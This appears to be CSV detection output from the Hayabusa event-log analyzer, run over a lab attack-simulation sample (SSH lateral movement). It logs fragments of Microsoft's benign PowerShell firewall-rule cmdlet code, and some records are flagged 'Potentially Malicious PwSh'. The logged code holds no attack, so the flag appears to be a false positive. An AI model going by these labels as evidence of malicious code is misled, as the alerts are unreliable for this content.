if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType';,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,eter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter 
= [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false 
if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType';,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' -Alias '*' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' -Alias '*' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; 
